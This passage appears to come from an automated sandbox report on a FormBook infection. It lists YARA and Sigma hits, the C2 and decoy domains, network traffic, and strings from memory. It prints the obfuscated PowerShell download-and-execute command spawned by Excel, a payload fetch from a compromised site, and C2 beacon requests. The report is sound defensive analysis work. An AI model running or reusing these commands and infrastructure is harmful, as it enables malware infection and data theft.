            • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            18.0.qMBRkI.exe.e30000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
            • 0x158c9:$sqlite3step: 68 34 1C 7B E1
            • 0x159dc:$sqlite3step: 68 34 1C 7B E1
            • 0x158f8:$sqlite3text: 68 38 2A 90 C5
            • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
            • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
            • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
            18.2.qMBRkI.exe.e30000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
              18.2.qMBRkI.exe.e30000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              Click to see the 1 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Powershell Download and Execute IEXShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), CommandLine: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4228, ProcessCommandLine: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), ProcessId: 4544
              Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), CommandLine: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4228, ProcessCommandLine: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), ProcessId: 4544

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
              Found malware configurationShow sources
              Source: 18.0.qMBRkI.exe.e30000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.koku-jieitai.info/w8en/"], "decoy": ["kratoscableties.com", "capialhealth.com", "crossandcrook.net", "thesongwriterschool.com", "serenityhomedits.com", "ivaporvault.com", "youhoddler.com", "my-financial-intelligence.com", "oshanskincare.com", "simplytomas.com", "quayvideohaiphong.com", "xn--produtosdesade-wrb.com", "mushroom.supplies", "tutiendaparagatos.com", "ppc-listing.info", "nocturnalgolfcartpeople.com", "gruzovikov.info", "lifecoach.works", "healthacker.com", "abhisclub.com", "xyohodlem.com", "nekotsuki.net", "leparpack.com", "fused180qr.com", "avadvisorsinc.com", "repairindonesia.net", "hyzykj.net", "cyberbeau.com", "pubgtroops.com", "cardiline.store", "cbdaclub.com", "yezq-yxvih.xyz", "autoproductosmercantil.com", "sarojgautam.com", "lilyrosecottage.net", "cinkenyo.com", "vixcheck.com", "enriquezcleaningservice.com", "xhzs021.com", "mundofreefire.online", "leteva.club", "dmosearch.com", "livisprogrammingadventure.com", "79firerescue.com", "think-ages.com", "skg-paxful.com", "anastasiamatkovskia.com", "cjmaeilnews.com", "vistaestimatingandservice.com", "reset-stance.com", "strivemdketamine.com", "historydecorz.com", "drdantherapy.com", "newbbwtube.com", "nicesubvert.com", "animalsneon.com", "sasayamagazine.com", "cristianbermejo.com", "instaespresso.com", "amanda-clark.com", "wire.wtf", "milfwagon.com", "waytogrowconsulting.com", "gourgio.club"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: Purchase Order.xlsVirustotal: Detection: 11%Perma Link
              Source: Purchase Order.xlsReversingLabs: Detection: 13%
              Yara detected FormBookShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, type: DROPPED
              Source: Yara matchFile source: 18.0.qMBRkI.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.qMBRkI.exe.e30000.1.unpack, type: UNPACKEDPE
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeJoe Sandbox ML: detected
              Source: 18.0.qMBRkI.exe.e30000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 18.2.qMBRkI.exe.e30000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: unknownHTTPS traffic detected: 104.21.45.223:443 -> 192.168.2.3:49744 version: TLS 1.0
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
              Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.387383065.000000000E1C0000.00000002.00000001.sdmp
              Source: Binary string: wntdll.pdbUGP source: qMBRkI.exe, 00000012.00000002.403330072.0000000000E60000.00000040.00000001.sdmp, help.exe, 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp
              Source: Binary string: wntdll.pdb source: qMBRkI.exe, 00000012.00000002.403330072.0000000000E60000.00000040.00000001.sdmp, help.exe
              Source: Binary string: help.pdbGCTL source: qMBRkI.exe, 00000012.00000002.402991598.0000000000BD0000.00000040.00000001.sdmp
              Source: Binary string: help.pdb source: qMBRkI.exe, 00000012.00000002.402991598.0000000000BD0000.00000040.00000001.sdmp
              Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.387383065.000000000E1C0000.00000002.00000001.sdmp

              Software Vulnerabilities:

              barindex
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: excel.exeMemory has grown: Private usage: 1MB later: 76MB
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 4x nop then pop ebx18_2_00E36A9C
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exeCode function: 4x nop then pop edi18_2_00E45630
              Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx21_2_00536A9C
              Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi21_2_00545630
              Source: global trafficDNS query: name: paste.ee
              Source: global trafficTCP traffic: 192.168.2.3:49744 -> 104.21.45.223:443
              Source: global trafficTCP traffic: 192.168.2.3:49743 -> 172.67.219.133:80

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: www.koku-jieitai.info/w8en/
              Connects to a pastebin service (likely for C&C)Show sources
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveContent-Type: application/x-executableLast-Modified: Sun, 21 Mar 2021 19:46:00 GMTEtag: "28400-6057a278-d89967789385f69e;;;"Accept-Ranges: bytesContent-Length: 164864Date: Mon, 22 Mar 2021 11:39:50 GMTServer: LiteSpeedData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c5 a5 8a 16 81 c4 e4 45 81 c4 e4 45 81 c4 e4 45 ee b2 4f 45 cd c4 e4 45 ee b2 7a 45 82 c4 e4 45 ee b2 79 45 80 c4 e4 45 52 69 63 68 81 c4 e4 45 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 3c 35 f6 44 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 72 02 00 00 00 00 00 00 00 00 00 70 d0 01 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 02 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 70 02 00 00 10 00 00 00 72 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET /r/r87uc HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-admin/bin.exe HTTP/1.1Host: simpsongroup.ruConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /w8en/?q6A=Ffktffp0pJmTzz&Dz=SghAdDp/cBBqHtwO7kpINEDEOwN5s0udgp1UmetwbAdBKH2/rJggP1HdksgR9LE8HJ+i HTTP/1.1Host: www.thesongwriterschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /w8en/?Dz=UkYqCOmDirKbZ6r6AMi5nYMGDuAEHfzDYA/cukhS4kI/uiLj0Ql+Qa4cH3YmUjIY4xUZ&q6A=Ffktffp0pJmTzz HTTP/1.1Host: www.anastasiamatkovskia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox ViewIP Address: 104.21.45.223 104.21.45.223
              Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
              Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: unknownHTTPS traffic detected: 104.21.45.223:443 -> 192.168.2.3:49744 version: TLS 1.0
              Source: C:\Windows\explorer.exeCode function: 19_2_063BA302 getaddrinfo,setsockopt,recv,19_2_063BA302
              Source: global trafficHTTP traffic detected: GET /r/r87uc HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-admin/bin.exe HTTP/1.1Host: simpsongroup.ruConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /w8en/?q6A=Ffktffp0pJmTzz&Dz=SghAdDp/cBBqHtwO7kpINEDEOwN5s0udgp1UmetwbAdBKH2/rJggP1HdksgR9LE8HJ+i HTTP/1.1Host: www.thesongwriterschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /w8en/?Dz=UkYqCOmDirKbZ6r6AMi5nYMGDuAEHfzDYA/cukhS4kI/uiLj0Ql+Qa4cH3YmUjIY4xUZ&q6A=Ffktffp0pJmTzz HTTP/1.1Host: www.anastasiamatkovskia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
              Source: unknownDNS traffic detected: queries for: paste.ee
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Mar 2021 11:40:49 GMTServer: nginx/1.19.5Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.anastasiamatkovskia.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Transfer-Encoding: chunkedData Raw: 31 34 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 0d 0a 09 09 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 41 6e 61 73 74 61 73 69 61 20 4d 61 74 6b 6f 76 73 6b 69 61 09 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 61 73 74 61 73 69 61 6d 61 74 6b 6f 76 73 6b 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 65 73 73 69 76 65 2f 6a 73 2f 68 74 6d 6c 35 2f 64 69 73 74 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 63 73 73 33 2d 6d 65 64 69 61 71 75 65 72 69 65 73 2d 6a 73 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 63 73 73 33 2d 6d 65 64 69 61 71 75 65 72 69 65 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 61 73 74 61 73 69 61 6d 61 74 6b 6f 76 73 6b 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 65 73 73 69 76 65 2f 63 73 73 2f 69 65 38 2e 63 73 73 22 2f 3e 0d 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 61 73 74 61 73 69 61 6d 61 74 6b 6f 76 73 6b 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 65 73 73 69 76 65 2f 63 73 73 2f 69 65 37 2e 63 73 73 22 2f 3e 0d 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 0d 0a 09 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27
              Source: explorer.exe, 00000013.00000000.388045564.000000000E6C0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
              Source: explorer.exe, 00000013.00000000.388045564.000000000E6C0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
              Source: powershell.exe, 00000002.00000002.376462177.0000000005416000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
              Source: powershell.exe, 00000002.00000002.373878203.000000000349C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000002.00000003.369389126.00000000088B5000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digic
              Source: powershell.exe, 00000002.00000002.376462177.0000000005416000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: powershell.exe, 00000002.00000003.369389126.00000000088B5000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: powershell.exe, 00000002.00000002.376462177.0000000005416000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
